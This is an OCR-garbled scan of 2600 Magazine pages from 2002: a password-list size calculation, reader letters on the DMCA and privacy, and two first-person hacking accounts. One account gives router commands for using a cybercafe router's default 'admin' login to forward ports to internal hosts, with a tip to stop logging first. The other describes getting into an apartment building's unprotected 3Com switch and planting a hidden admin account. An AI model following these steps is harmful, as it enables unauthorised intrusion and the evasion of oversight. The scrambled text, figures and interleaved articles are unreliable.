foe ix COOL ICR j He likes Cheese Pizzzafj CR I DM CA Sucks.
What you see:
DMCA Sucks.ei.se Pizza!
This is because the computer prints the first part* Joe is COOL ', then hits the carriage return control
haiaeter and sets the cursor back to the ,1 in Joe. Then it continues with the next line. He likes Cheese
I V/iifi" overwriting What was on the screen before. Since there was no linefeed* the computer did not go
lo the next line.
The most common place you may experience problems from CR and LF mismatches is during telnet
UK I terminal sessions* Telnet is not as much of a problem because most servers have adopted the V'TIOO
standard, hut using a terminal emulator on a modem has been famous for tins kind of trouble. Also CR
and LF play a major rule When using a dot-matrix primer. Anyhow, back to the file formatting,
f his is why sometimes if you copy a text file from one operating system to another, it doesn't open
i fit. There are simple ways to fix this, such as opening them in a program that understands the format,
then resaving them. But the fact is that Uni x/L mux and Window s/DOS use different (ext hie formats, and
i f i/e of a password file will \y? larger on a Windows/DOS system than a Unix/Lmux system*
Windows/DOS requires a text file to have both the linefeed and carriage return codes, while
i hm/Linux requires only the carriage return (under most configurations).
So, lei’s get to the math. As discussed earlier, a password can contain any of the characters except the
i 1.1 (code 0) and the carriage return (code ! >)* So the question is* how big would a text file be that
Spring 2002
Page 43
contains every possible Unix/Linux password?
Let's figure it out.
For all practical purposes, we are going to assume the password can be made of any ASC II character
except 0 and 13, and that it can be between zero and eight characters long.
So, at the 256 possible characters, we are going to be using 254 of them. Let's make a chart of the
possibilities.
We know that there’s only one zero-character password, a blank one
Now. for each of the remaining combinations, we are going to use Lhe formula 254 A (number of char-
acters). This will give the possible combinations ot 254 characters for any given length of password.
Number of
N umbei of
Number of
Number of
Number of
Number of
Number of
Number of
0 character passwords;
1 character passwords?
2 character passwords:
3 eh arse ter pa ss words :
4 character passwords;
5 character passwords:
6 character passwords :
7 ch aracter pa s s wore s ;
1
254
64,516
16,387, 064
4 , 2 62 , 314,256
1,057,227, 321 1 024
263,535,866, 540,036
63 j 208, 110, 101,284,384
Number of 8 character passwords : 17, 324 , 863, 965, 700, 83 J , 536
TOTAL : 1 7, 393,337, 673,075, 145, 131
Whew! That's a Sotta passwords! But bow much hard disk space will a plain text list of them all take
up
Well, let’s do more math 3
Let’s assume the password list will be stored on a Windows/ DOS system. This means that every en-
try will require a carriage return and linefeed byte to maintain the text file format. ,5n. here’s the formula.
Site - l Number of X digit passwords *(X + 2)/
Breakdown: The space needed on the hard drive lo store this set of passwords t in bytes) is equal to the
number of password combinations in the set. times the length of each password p us 2 (carnage return
and linefeed).
Example: There are 254 one-character combinations. So that’s 254 passwords times a length of three.
Each password is three characters long because of the one-character size, plus the carriage return and
linefeed.
Okay, lets form another table.
X' ft of Passwords * (Digits + 2 ) - Size in Bytes
0
1
2
3
4
5
#
7
1
254
64,516
16, 387, 064
4,162,314,256
1,057,227,821,024
268,535,866,540,096
68,228,110, 101,184,384
f 0
f 1
f 2
f 3
i 4
t 5
f 6
{ 7
L2 J - 2
+ 2 J - 258,064
+ 2 } = 81,935,320
+ 2 / - 24 , 273 , 035,536
+ 2 J * 7,400,594/747,160
+21= 2,148,286,932,320,768
+ 2 ' : 613,872,990,910,659,456
8: 17,324,859,965,700,83.3,536 * t 8 + 2 ) = 173, 248, 599,657, 008, 335, 360
TOTAL t 173,864,623,360,502,142,436
So. how big would a Window s/DOS (ext rile that contained every possible Uni>./Linux password be?
Looks like 1 73,864.628,360302, 142.436 bytes.
Thai s 1 69,789,676.2 Terabytes.
Well, this is every possible password ever, but remember I said that 99.9 percent of all passwords only
used characters between ASCII codes 32-126? Lets figure this whole thing out again using this see in-
stead of the whole shebang.
Number of 0 character passwords:
Number of 1 character passwords:
Number of 2 character passwords:
Number of 3 character passwords:
Number of 4 character passwords:
Number of 5 character passwords:
Number of 6 character passwords:
Number of 7 character passwords:
1
95
9, 025
657,375
81,450,625
7,737,809,375
7 35,091,890,625
59,833, 729,609,375
Number of 8 character passwords: 6,634,204,312,890,625
Page 44
2600 Magazine
V: 4 of Passwords
/Digits + 2 ) = Size m Bytes
I 0
1 1
i 2
)3
4
f 5
I ^
7
1 8
1
95
9, 025
857 , 375
81, 450,625
7 ( 137,809,375
735,091 .890,625
69,833, 729,609 , 375
6,614,204,312,890,625
( 0 t 2 ) =
{ 1
2
3
4
( 5
( 6
i 7
\ 8
+
f
■f
f
■f
+
2
2
2
2 )
2 )
2
2
2
2
) =
) -
J -
) =
) =
) -
2
285
36,100
4,286,975
488, 703, 750
54,164,665,625
5,880, 735,125,000
628, 503,566,484,375
56, 342,043, 123, 905,250
TOTAL: 66,976,482,088,208,262
So. a plain text Windows/DOS format text tile containing every possible Unix/Linux password for
\SC1I characters 32- 126 would be:
66,97 6 ,4 8 2 , OK 8 , 208 , 26 2 bytes which is 65,406.7 Terabytes.
Quite □ large file.
Perhaps now you can understand why I am forced to laugh when 3 see a program on a web page or
BBS that claims to be able to generate a complete password list using the entire ASCi ! alphabet. Sure, the
program probably could do it, if it had two million terabytes to work with. And, oh, it would probably take
a few decades too.
My point being, brute force is a real time-consuming game. It takes raw power that most of as just
don't have available. If you need to brute force, then you'll need to get a program that generates the pass-
word list as it goes* therefore making the requirement for free hard drive space a little less.
While most of you probably knew that a complete password list would he quite a large file, even I was
guilty of thinking a 40-gig hard drive would handle the job. By writing this article 1 hope to have opened
a few people’s eyes and save you the wasted Lime of trying to accomplish something that is, at best, a bad
idea.
In conclusion, I have a question* What do you and all the computers you come in contact with all have
in common? They both are capable of doing whatever the hell you want. Peace Out,
Greetz: sybah , tekniq, radiate, Mr I \ myke&LM
I Special Thanks to Windows Calculator J
by gOOgle miner
gOGgle mi n e r @ f the ri a , com
I was sitting in a cybercafe recently, daydream-
in' how nice it would be to remotely access these
lie. Linux boxen in front of me to hop around the
noi anonymously. I gave il a shut. No shell access -
■u meone direful set up these hosts. 1 tried to shod
dcr surf die password out of the bored (but helpful)
do worker. My eyes were too slow. IT oh! I tried
browse / via the browser - no luck. The front
■ "i was impervious. But 1 asked myself if some -
ne had set up the "back door" with the same at-
tention to detail. 1 surfed to
haiismyipaddress.com and got the IP address. 1
i i note of it on my PDA. Back in the lah. 1
I* Ted around. The IP addy turned out to be a DSL
muter doing network address translation (NAT) for
the cafe's machines. This is a pretty common
setup, since it’s cheap and secure if it s set up cor-
rectly. Emphasis on the last part of the sentence.
gOOg le percipl ex: gOOg / e (205/ re l n et
632228.xxx.xxx
Trying 03 . 228. x.\.x .xxx , , .
Connected to 63.228..xxx..xxx,
Escape character is
Flfwpoint/2200 SDSL (AIM ) Router fp2200-32
v33. } Ready
Login:
Lessee, could that be on a default password
list? ! surfed to www.phenoeltt.de/ dpl/dpLhthil
(this site is threatened by the DMCA, incidentally)
N firing 2002
Page 45
and saw the default immediately: admin (sad, hut
true).
tfigin:*****
Logged in successfully *
Now what') i had to figure out a way to do
some port redirection so that the Flow point would
Forward specific service traffic to the same port on
internal, NAT’ed hosts. After some Google (afi)us-
age, I did:
# dhcp list
and saw the IP pool oJ reserved, nun-romeable
addresses handed out to the cafe clients upon issu-
ing a DHCP request. 1 chose one of the IPs and is-
sued the command which would do the port
forwarding from the Flow point to this particular
internal IP address and port, I chose ftp since it
comes enabled on many Linux distros.
it rent addServer 192. 168.254. 19 tcp ftp wan
ft exit
Now 1 tried to connect to the masqueraded
host:
g ( X)gl e @pe triplex : gOOgl e / 206 / ftp
63.22S.xxx.xxx
C Qt meet ed to some, t ybe n :afe. hex t
by Chris Byrnes
JKAH Communications, LLC
http://wwwJEA H .net
A few years hack, the government split tap (he
monopoly Network Solutions held on the registra-
tion market. Now, at (hat lime, they still allowed
Network Solutions to control the global registry
(the thing I hat all competing registrars report back
to so all the data is kept in sync). As you may
know, Network Solutions is now owned by
VeriSign,
Our good friends at Vert Sign not only operate
two registrars (registrars.com, and Network Solu-
tions k but also this central registry catted
VeriSign Global Registry. ’ Lots of domains have
been expiring in the last few months as people for
get to pay their bills, dot com companies flop, etc.
When these domains expire, they are supposed to
be deleted within a maximum lime frame of 30 to
45 days. Otherwise the registrar must pay an addi
ttonal registry fee to keep the domain active (No
registrar will do this if they don't get paid by the
client, of course). ThN is all according to the
global registry policy.
220 some>ry!nnrufr.hosr FTP sen er ready.
Name (seme, cybercafe, hesttgOOgle}.
Woohoo ! h worked. From here, 1 could do any
number of things which I will leave to your imagi-
nation Note that in getting to this point, 1 did not
change the Flow point admin password, muck with
DM CP leases, or generally cause unwarranted
chaos. I also look the time to restore the serv ice to
its previous unforwarded state when 1 was fin-
ished:
ft rem do I Server 192. 168.254. J 9 tep ftp wan
If you try this for yourself, remember not to
choose telnet as (he forwarded service, or you w ill
lose communication w ith the router on subsequent
connects, M would also be wise to temporarily turn
logging Off prior to exploration of I he Flow point
OS:
ft system log stop
Although this example worked for a cybercafe
setting, you will encounter similar setups else-
where since many people l ) mist NAT blindly and
2) are too lazy to change default passwords. It
should be eus\ to do fhis for Cisco DSL routers as
well.
Lei ’s do a WHO IS lookup on a domain I know
is expired, because I've been trying to register it:
skullboeks.com, skull hocks, corn, of course, was
(he domain name used in the popular movie An-
ti Trust. 11 This domain is registered at Network So-
lutions and it says "Record expires on
05-May -200 1." So I contacted VeriSign and asked
why ihe domain hasn't been deleted yet. No re-
sponse.
I spoke w ith an official at a competing registrar
who told me, "VeriSign essentially is allowed to
break its own rules. It just says that it pays itself
the additional registry fee to keep (he domain
alive. In all honesty VeriSign could continue to
hold onto as many expired domains for however
long it warned, and never be breaking the registry
rules."
ICANN, the non-profit corporation that was
formed to assume responsibility tor the IP address
space allocation, protocol parameter assignment,
domain name system management, and root server
system management functions, has yet to adopt a
policy that supersedes the policies put in place by
VeriSign in (his matter.
Page 46
2600 Magazine
by, Javier (X skftss matched with the MAC address in port 18, My
j a v i h 3 @ y a h oo. com
I iiiTi writing 1 his article because many admins do
noi seem to grasp the importance of security- espe-
i iitlly "inside" security. Last summer [ moved into
■>omc new apartments here in beautiful west LA.
About a month inter we decided to hook up our place
with DSL,, so we placed u cal! ami scheduled an ap-
pointment, Weeks later we had DSL, As soon as the
■ a hs were done with (he installation, t busted out my
I inkS VS switch a ltd a couple more hubs and hooked
mv whole place up. First thing 1 did was an IFCON-
I IG to yet nn IP info i noticed that we were on a
>ltCP based service and that wc were not the only
■ >i k-s. on the same network segment I decided to se-
me both of my roommates Windows boxes, uns har-
em the drives, setting passwords and permissions for
hkw and printers. When all c hai was done I checked
my Linux box. 1 was curious to see what else was in
our same segment, so I busied out the trusty NMAP
■ ww wnimp.org) scanner and did a: #>nmap nO
F*2 168.0/24 > results. That way it would scan the
hole network based on a class C address and the re-
al I Is from the scan could he saved to the tile "results".
V' exfK’cted. 192 .168.1. 1 and 192.168.1,2 were inter-
line.. The first one belonged to a Cisco router ansi
tin second address belonged to a 3Com sw itch. So 1
did a quick telnet to the switch and didn't gel a
prompt So 1 hit the ENTER key twice and burn! I got
login prompt. 3 com switches by default have no
password set According to the manual, you are sup
■ cd to set one upon installation,,, tsk, tsk. So J typed
in Admin" with no password and I got ihe follow ing;
i //sir i. min} if}
t\ iwiiwrf;
!■ nn nptiotto: 3Com SuperStaek 11 Switch 110(1
'hi met Administer Ethernet ports
ip Administer IP
up Logout o f the Command Line Interface
■~'Ui if j / 1 dmm i s re r SNM P
m os n i - Administer system-level functions
• fu /or kelp,
mwt i too i 1 1
hi ■ menu option;
I went to the Ethernet menu tmd checked the sta-
ll si ie* on all the pons. Of course they were all set to
ill duplex. So ! quickly ran 1FCOMHG again oil my
mi pi iter and got my MAC address. That way I
■uld check the tables on the switch and lind out
i port I was assigned to. 1 found my MAC ad
roommates' MACs also matched port 18, So i went
back to the switch and decided to change our port to
full duplex. I logged in and typed:
> e the met <ente r>
>pt>r i Mode <? m er >
Nc.\l it asked "what port? 1 ll So 1 typed 18 and then u
asked to enter a value.
Select Ethernet port f 1-26); 18
Enter new mine \ IQkalf lOfttll} { lOfttllf:
f entered " lOfuJl" and was sent back to the main
menu. ! douhlechecked my work and port 18 was at
"10 full". Cool! Next ! would create an account for
myself, just in case an act of faith occurs and the ud-
mm decides to check his network and devices. Trying
to make the account not seem suspicious. I named it
"system" and gave full access to it. Before any
changes take place you have to reset the switch, which
can be done remotely Now by doing some bandwidth
tests, 1 sec some improvement on our connections It
is not a huge difference since all I did was double the
throughput of the port (full duplex doubles the
throughput of a link), so the bandwidth and other net
work traffic was still the same. 1.1 ut at feast it helps,
Now the other IP address < 192. 168.1 l ): I was able hr
telnet to the Cisco router and get low level access.
Nothing really useful but by running the command: "
>shmv version" J can see that it is a Cisco 2600. The
only way to get root that I know of requires physical
access to the router. Hmm ... 1 guess I can look around
my building next lime t take out the trash There are a
lot of other security issues with this setup, like the
ever famous ‘file and printer sharing" by Microsoft,
All I had to do was open up My Network Places" and
choose a workgroup (about five exist on my segment),
then just see what hosts offered what services, li was
really kin da easy to do a "net use x; AlpaddressVeS" on
my computer and mount some person \ drive since
Windows by default shares \c$ and VI PCS. But I was
more interested in the switch and router than snooping
around nlher people s drives
As admins and enthusiasts, always secure your
shit from both sides and never trust ihe users
Shout (mis to: Happvdrgn, AlefZZ* Escorpion. Ih-
tlesunshyngrl my Enmity and to till my other friends. *
Spring 2002
Page 47
Continued from page 3 |
1 wrote my own tetter
"Back when I was in high school 1 lead magazines
about computers and software. Then I started budding
my own computers front pails salvaged from friends*
old computers plus whatever I had to bay to put every
thing together.
"1 would also sometimes * borrow' software which
[ cow Ui. not ufU'rvd to purchase , While this was illegal, it
is a badly kept secret that this can sometimes greatly
help vendors of the most expensive software to have, it
widely available to people interested in learning the
software. They then go to work for companies which
buy hundreds or thousands of copies. In fact, some of
the most expensive c restive software es now being
given away free to non-business users for exactly this
reason.
"If 3 hadn' t gotten that experience I wouldn't have
the great job and career I have today I am now well
paid and therefore have quite a bit of disposable in-
come which l ttsc for software, new technology, and
entertainment.
"On the entertain men t side, there have been dozens
of reports showing that Napster actually increased al-
bum sales. DVD, which most major studios initially
tried to destroy in favor of a horrendous pay -per- watch
format, has been the best thing to happen to that indus-
try since the V ITS machine (which you may recall they
also fought).
"Regardless of what i* good for Corporate Amer-
ica, for once please concentrate on what is good for the
citizenry. There are laws on the books right now which
clearly establish the right of a customer to make a copy
of an item they’ve purchased for use in another format
(ex. for transfer to a more portable system) or as a
safeguard against damage ns the original These rights
arc being violated by members of the MPA A and espe
dally RIAA every single day. yet nothing is done,
"I ask that you not only prevent the likes of the
SSSCA, but that you look into the continued routine
violations of customers' fair- use and other rights, un-
fair business practices, and price fixing by the compa-
nies supporting SSSCA "
— Jeremy M Lang
If mo n f yeopl e took t h h kin d of in ft* re st , including
v ending tetters iu the mail, making phone calk, rufrf
even making appointments to talk wi$i elected offi-
cials. ii would definitely make a difference. Since this
letter was sent, the SSSCA has hern returned the CB-
DTPA {Consumer Broadband and Digital Television
Promotion Act}. Keep updated, and spread the won!
it '.v really our Only chance^
Corporate Corruption
Dear 16(H):
\ received a rather interesting mailing today from
MCI. The letter, which is attached to a couple of pi as-
tic cards, advertises a new service allowing MCI sub-
scri tiers to dial home using a toll-free number
( l -8fK)-4H4-b236) and a four digit code Each call
costs 35 cents a minute, plus a 26 cent access charge if
the number is dialed from a payphone. Interestingly,
the card is already Activated and no password is
needed - just the four digit code on the card. Now, I got
curious about this and dialed the number. When
prompted for a code. 1 entered something random and
the call began to ring through. Uh oh! This means any-
one can dial into tins system and hit random stuff, in-
curring charges on unknowing MCI customers' bills.
According to MCI "Your [calling cards] are ready to
use right away. There's no need to sign up for anything
and no extra fee to pay [which, by the way., is not quite
true l" 1 don't see much potential for abuse here, un-
less you drop the card and some random individual de-
cides to call you up repeatedly out of maliciousness -
or. as in the previous example, if some asshple just de-
cides to go wacko dialing numbers. Neither of these
things are likely to happen, I suppose, but i would be
willing to hei (ha! every [lumber 0001-9999 rings
through to a different individual’s phone line. Mj.sdiaK
are bound to happen, and one person's mistakes are
conveniently charged directly to another’s bill. Not to
mention that the service is a ripoff - the only possible
use I can think of for it is if you are at a payphone with
no change anil no access to a cashier or an ATM. Using
a conventional phone card would be more economical
in almost all cases. MCI is essentially charging you ex-
tra to dial your own phone number by way of an inse-
cure, Hawed proxy system ihai is unnecessary abouL 99
percent of the time. The ad sheet should have read,
'Make long distance prank phone calls - and charge
them to someone else’" J*d go for that ( sarcasm I.
~toast66i)
To pul this kind of a "feat it re'' 1 on someone 3 phone
hue without their permission is, at hr si. extraordinar-
ily sleazy on XfCIs part .
Dear 2609:
In your response to DarkBtayd i 18:4), you stale
thai you don't see how it’s possible for Radio Shack to
lose money if someone elects not to activate a piece of
hardware ihyi they've bought (such as DirecTV). One
word; kickbacks, 1 worked for the Canadian arm way
back when cell phones first came out. Radio Shack, as
well as the competitors, sold cell phones at or below
cost. We got a percentage of the money the airtime
package cost (usually around $300), I was directed to
not sell a phone unless die .customer activated tl in the
store before he/she left. One of my cow tinkers "forgot"
and was Lanced.
vidieOn
If it's clearly understood that an item is only for
sale if its activated, that's one thing, ft's quite another
if it s simply ud verified at a certain price and then alt
■ )j your personal info iy grabbed alike point of sale as
a f'condmotC for getting it at that price..
^ - % Mm <*m»
I am writing this letter in order to inform you so
you can inform the public. Recently all
Comcast & home {around SGOjOfX)) users were transit
tinned to conicast.net. Without warning Comcast cut
the service levels ©home users were getting in half.
They have also created connectivity issues with the
poorly executed network and their privacy invading
proxies that aren't even i^bfe to be user-disabled. After
all this the price is still rising. I pay the same amount
for less than half the service. Comcast doesn’t even
Cage 48
2600 Magazine
I i,i vc a news server set up. Also, i he upload cap they
have set m place has made it difficult to even down-
'*'dJ simple files. I've gone on below to list w r hy this
proxy setup is so bad.
] > Access to IP restricted resources is disrupted. In
order io facilitate access to HTTP IP restricted re-
-oyi'ct's. 1 must allow the Comcast proxy server to ac-
cess these resources. If l allow the Comcast proxy
server to access these resources, I inadvertently allow
my other users of the proxy server access as well.
2j There is no check and balance on Comcast/ ATT
in how they implement the Inktomi Traffic Edge soft-
ware or what they do with the information they gather,
'■ i even what information they do gather
t) Customers were not noli lied of [he change in
set vice.
4) The Comcast call center was ignorant and un-
i ware ol the change m service.
5i Software which would defeat the intended pur-
pose of the proxy server t Virtual Private Networks) is
unhidden to be run or implemented by residential
1 omcast customers per <he Comcast Acceptable Use
Pul icy and Subscriber Policy.
to Ihe Traffic Edge software has the ability to ex-
I lkIc IP addresses from participating in the proxy. I
should he given the opportunity to opt out of this ' ser
sia:' (I should have been Lold I was opted in to some-
thing in the tirsi place).
tdn top of all this you have no other choice if you
want cubic Internet access If Comcast is hi your area,
they are your provider. Not In mention that Comcast,
the number three biggest cable provider in the nation*
bought AT&’I Broadband, the number one biggest
i io ". nier. Comcast has bought out almost all the little
providers over the years. Now you have Comcast from
I In I add phi a to Miami. There is no competition. It’s
i v to tell Comcast has no desire to make things bet-
Ihe only desire they have is to drive up prices by
giving less and less service and charging more and
more.
Robert Williams
I tear 2600 :
During the Gramm ys a representative of a record
i ompany spewed for about five minutes on how the
musk food chain'’ is in danger by people who down-
1 id and pirate music. Throughout ihe entire spiel he
■ Viis making false, accusations, saying that every kid is
f • . n loading music on ihe computer behind (hen par-
tit A bucks, able to download 6 .(XX) songs in three
lays Come on! 1 live off a shit 5bk connection. There
. no way 1 could even start on that number! He was all
oncemed about how- the artists will not receive their
money when they make about 52 off every CD while
if i rest is sent to record companies. It scents be is
lore worried over his money than the I 11 music food
ham. Give me a break!
c(M3wr_kh3r
ib \nnrid he interesting tn ask this guy if he actually
iii u ght someone would buy that amount of minor in a
■ on l store: if that figure is any where close to true
■■a d we don 't believe it for a nanosecond), they should
happy that people are taking an interest in their
prod w t and busy thinking up ways to exploit that in-
ti o a fu reality the musicians are being horribly de
reived ami taken advantage of by their own record
companies. A recent "settlement" with online music
distributors resulted in money going to the record
comparers - and nothing to the artists. We were?} i a hit
'i u r* inset I hi it a h >t r >f music ions 1 1 >e re .
Dear 2600 :
It appears Disney is starting young with its brain
washing (not that I’m surprised). My girlfriend was
llscking through the channels tonight and started to
watch this cartoon oil the Disney Channel called "Th e
Proud f amity." It featured this young kid in a black
trerrehcoat (a Matrix spoof) enticing his young girl-
friend to download free music from his website. She
complied and then turned into this crazy mu sic -down-
loading Ireak. This eventually led to her arrest and be-
ing banned from ihe use of her father's computer.
Later she was again enticed by her misguided black
trench coat- wearing friend (who is obviously Disney's
demented impersonation of a hacker) to download mu-
sic again. This time, instead of her arrest, she finds at a
local CD store that all of the CD s are gone, leaving
the store owner broke. Her music downloading is Io
blame [of course). Not only is he out of business, but
various people are out ol jobs who have nothing to do
with the music industry. At the end ol the show she
Lulls this oh so evil hacker kid that downloading music
is stealing and to go away. Of course the show ends
with her getting a great big hug from her mom telling
her she did the right thing,
nomgtion
Should anyone he surprised at this kind oj propa-
ganda when such corporations practically own the
airy caves in this country ? And the only reason we even
say "practically” is because, at least on paper the air-
waves still belong to the people and ran he taken hack
if the current holders ewe deemed unworthy. This ap-
plies to cable outlets as well .
Dear 2600:
3 was reading through an article today and the
headline read Moviegoing Set Record in 2001 " Ap-
parently the movie industry had the highest grossing
year in 2001 since 1950. Now this strikes me as odd
because there have been so many news articles about
how the M PA A is losing billions of dollars each year
to movie piracy. I went looking for one of these arti-
cles. and found in one a quote I thought was interest
ing: "Claiming that the movie industry is losing $3
billion annually through theft of its product in one
form or another, f Jack | Valenti said that what w as now
happening could ‘disfigure and shred the future of
A me r i can fi I ms r bee an .sc of \ he case w i t h which f i 1 ms
can now be copied and transported on the Net."
Dash Interrupl
We’re becoming increasingly convinced that
there s a parallel universe MPAA that's adversely af-
fected by these things. There v realty no other explana-
tion as to how they can make spcM dkitptgtrically
opposed statements and expect the#? both to be true
Other than perhaps someone not being co’mplelriy
honesty that is. Yeah, well ga with the parallel tab-
verse theory.
spring 2002
Page 49
Deft r26ffl;
Yesterday my Business Tech class had a rather
lengths dehate on the issue ot open source. We also
discussed the controversial "sharing" of files through
services like Napster, Kazau, md Morpheus. Tve a i
wav s liked getting stuff lor free through those serv ices,
but I’ve al ways sort of been on ihe fence on that topic.
1 mil yesterday. We were right in the middle of this big
discussion and 1 was being uncharacteristically quiet
Then something deep inside of me woke up I realized
something People say that these services are killing
the recording industry, 1 say let them kill it. Destroy
she establishment. Kill all the record companies and
movie studios You can't kilt art so is will go on with
out them. Only instead of having poppy little pieces ol
■hts like Brittany Spearv and Warner Brothers, you 11
have tin underground coalition of artists, producing
their work in their basements and sharing ti wiih the
world for little or no money via the Internet They'll
have day jobs and still continue to produce their art be-
cause the% truly believe in and love it forget about
money, lose your self image. Indulge your passions,
embrace youi art. Free your mind, and lake down the
system.
Brad
Article Feedback
Dear 2600:
Your contributor "angelu/aharia" is most griev
nusiy mistaken in the article Behind the Scenes oo a
Web Page (IK -U when asserting that Akamai pro-
vides its image delivery services free of charge." I can
assure you that they do not. At least nut intentionally.
Akamai is i "content delivery network they op
craft an "edge net wot W H i>f obyeo cache servers plac-
ing them in hundreds of NOCs around the world
i though itiostfy in North America). The lung URLs at-
tached to "ukanufed" images PDFs, streaming media
i iles. and ot her web page components arc actually spe-
k rally assembled L RL> thal include a cache rule, a
tiniesiamp and/or fingerprint of the content cached,
and a serial number that identifies Akamai's customer
ulvc web site that owns the component - Wired/Terra
Lycos in the case of the article's web page), Akamai
caches copies ol the " heavy M items on a web page on a
network of servers, and then uses its ow n proprietary
algorithms to identify which of the edge servers re
closest fin a network sense) to the end user and then
i ie 1 1 vers i he ct >nte n t frt >m t ha i se rve r.
This is meant to improve ihe response time for
building 3 complicated web page by limiting the num
her of network hops that heavy content needs to tra
v ersc to reach the end user. It is also supposed to lower
die amount ot server hardware that a media company
like Terra Lycos Isas to invest in themselves by limiting
the number ol requests thai come to the site’s origin
servers. The media company pays dearly for (his scr
vice - rn my experience up to lour limes die cost of
bandwidth available from ihe typical bandwidth
provider ai a evocation center. Whether the supposed
im pro’s eftipnt in web page performance is worth the
exorbitant costs i at Yeast .for simple object delivery) is
a matter of no small debate.
As an added bonus, anyone who can figure out the
format of an ‘ARL (Akamai Resource Locator) can
piggyback their own content on a paying Akamai cus-
tomer's account. Like I said, they don't intentionally
give their bandwidth away for free
The author implies that Akamai makes its money
by some form of underhanded distribution of end-user
data. That has not been my experience They have no
problem selling ihe data hack to the web site owner
but they do not cross- sc 31 this information between
firms, as that would lie a quick way to get themselves
sued out of existence, not by the end -users, but by the
media companies themselves.
And ihe author s supposed shock at lycos.com
cookies and URLs sprinkled about a wired.com page
should lx- no surprise at alt. Wired News is simply a
brand owned by Terra I yens Of course they are going
n i track your activity tm Their entire family of sites, lb
those folks, you’re not browsing separate sites Yon
are merely browsing different "properties" owned by
Terra Lycos It is a rare media. company that operates a
diversity ■ >t sites and does not do this kind of thing. < )l
far. far mure concern islhn J-party traffic watchers like
Doublet 1 ick,
MSM
Dear 2600:
Maybe because I work in advertising, maybe be-
cause I have more training in economics titan the aver-
age bear maybe because 1 know people who work for
Niros like doubleclick .net, but maybe because I like
tree goods and services, is why 1 have to complain
about all the derisions against doubleclick, akarttaL el
ai.
yes, these firms do invade privacy. They track a
unique identifier - you." as it were, arid they know
when you have been sleeping, thev know when you’re
aw ake, etc Blit these linns do not pose a threat against
us 2600 readers should have an affinity for how things
work and should know how to get around them lb
avoid ads without overhead go to
htlp://w r wu. yoyo.org/~pgl/adservefs/ and edit vour
hosts tile. Turn off cookies, or use einikie management
software, or just do it yourself to your temp folders
from time lo tunc.
These hr ms provide their clients - websites like
wired, for example, u ith the revenue that allows them
to go on publishing fret news on ihctr website If vent
use any ol the ubiquitous free services like weather,
news, e-mail, etc services that not more than ten
years ago cost real in one y , you have 1 1 n u s like Jon
blectfck and akarnai to thank for it
Fm not saying that should open your system up for
these turns to pick through, by no circle h of the imagi-
nation. Bui insofar as online privacy is concerned, the
real "had guys" are linns that produce things like the
infamous B I )L installation engine, ComeiCursor. and
others that surreptitiously track your movements. We
all know that doubleclick tracks online activity - that's
what they do They arc not hiding behind a tile sharing
protocol, or a web sin "enhancement " A lilile hit of
privacy is ihe price of admission to premium content
sites. \nd there is a worse Case scenario. A subscrip-
tion based Internet would give you even less privacy
because now they would have a name, address, and
credit card number to match up with a browser s
Page 50
2600 Magazine
unique global! identifier Knowing this, irKiead of run-
n tig at the mouth at how Vvil these firms arc. put tip
id simt up As Jong us nit ot douhJeelkk's 1 *RLs are
pi tilled at 127 0.0.0. they don't know me. and l don't
care.
Kurt Winter
StHtu* goad points, bur what happens whan they dr
- h they 'tv tired of people like von who bypass their
rocking software' 1 Perhaps they wilt even make it a
i me Stronger things have then happening We feel
hu pie should at least tune the option of t bedding if
they want to pirn by these tales. By letting people
it tow fun i they u ark and with some of the itifbrrnation
■n vi provided, people are better armed to deal with
Hut just I mu use these moneymaking Joins ate
m \ trued that this is the only wax the net eon be nut
dte sni make it so. We should always be Striving for
1 v to provide information and sendees to the musses
'* ■■■ u vs that arm t offensive, intrusive. or expensive.
I Kir 2600:
In the irlivk Babies on Answering Machine
Mi king" in IS k Horrid presented a UN)5-digit sc
• I iienee that contains ail the Ldign numbers between
" ><i and 1 >W. IK asked for another such sequence the I
liorter Welt, it may be a bit simplistic but if he re-
■ 1 'U‘d the two imiling zeros from his sequence and
aided a 9 at the beginning, it would he shortened by
me digit while still contain mg all the numbers. It is
well enough to use a computer to generate a number
requenee. bur one should exercise a little reasoning its
well.
ascii 32
),m managed to shorten it hut soar triumph isn’t
■me to fast verv long,,,.
I H-nr 2600:
Horrid's string for accessing answering machines
hi t-digii passwords is almost prefect 'Hie minimal
ngth tor such a string is 1002 digits, not 1005. t in
in: ml. the length of a skeleton key for an arts wiring
. . bme code of length n is lO^n+n-l J In order to re-
unnecessary repetition from Horrid's string,
unply remove positions *W, I 000, and 1001. (The
;ii die end of the string becomes WlO.)
ted
tl -on otnhine tins with the previous letter i idea.
■ii i an vet this down to WO!
I t i ur 2h00:
After reading the article in 18;4 enmled Exarmn
Ml dent Ihitii bases. I ni surprised that St reamer
| kind s wasn't aware that most universities have some
- i i siiulc n Ui acuhy database that s available for the
ol's li si' Now what is amazing is that my school
(which shall remain nameless to protect the innocent)
this information publicly available to everyone
(h just a short jot on the URL, Now if s just a good
■ that ChaiHix's friend's student ID isn't his SSN
it is with other schools [imagine the fun). Now the
►pimu to change it does exist, hut it is one of those
i;s that the school information technology depart -
M lorgcts to tell you during orientation.
P4R4d0x
- hit hy us, the State t > ft i versify of New York at
■ ■■ Hnu>k In o tl system t ailed SOAK t Student On
line Access to Records i that nm only keeps information
on students { transcript, addresses, plume numbers,
etc.) hut on til! alumni, often without then knowledge.
The username is the SSN ( easily obtained as it 's also
the student ID which is printed m everything from
term papers to grade pastings) and the password is tin
vr'.i digit hinhdote (also easily obtained or easily
guessed} I'hose few individuals who managed to fig-
ure out how to change the password in the post will be
delighted to learn that they apparently revert back to
the default after a certain amount of time, it s said that
a new system called SOLAR is about to be launched.
Let's hope the added 1 somehow brings security.
Dear 2600:
A ye a i ago, I picked up a copy of 2600 and was
very food of the information found. It was something 1
could read and not cringe ul Fast forward to today and
ail l sec are articles on right click suppression" and
"building a wooden computer." Not to mention that
many letters arc angst filled piles of jealousy and stu-
pidity from high school nitwits What’s happened to
26002 1 1 seen is io have been going steadily downhill
Also, mi regard to the letter about the libertarian
Party, your assumptions arc wrong. Libertarian beliefs
are founded Upon freedom for both the individual and
tor the corporation, as wad 3 as the be lie I m personal re-
sponsibility. Corporations are not always honest or
ethical, and the goal of Libertarian views is to prevent
the corporation from impeding upon the citizen un&fc
mg laws like (he DMCA null), and allowing die citizen
freedom from the state, socially and economically.
Scott
Usual lx when were accused of going steadily
downhill, its for a longer period of time than a year
Perhaps you meant to accutu us of a sharp decline? As
for Liberia rum beliefs, it all sounds great except far
the fact that it doesn't work. If a government lets huge
corporations write the laws (suck as in the United
States today), it's lit tie different than there being no
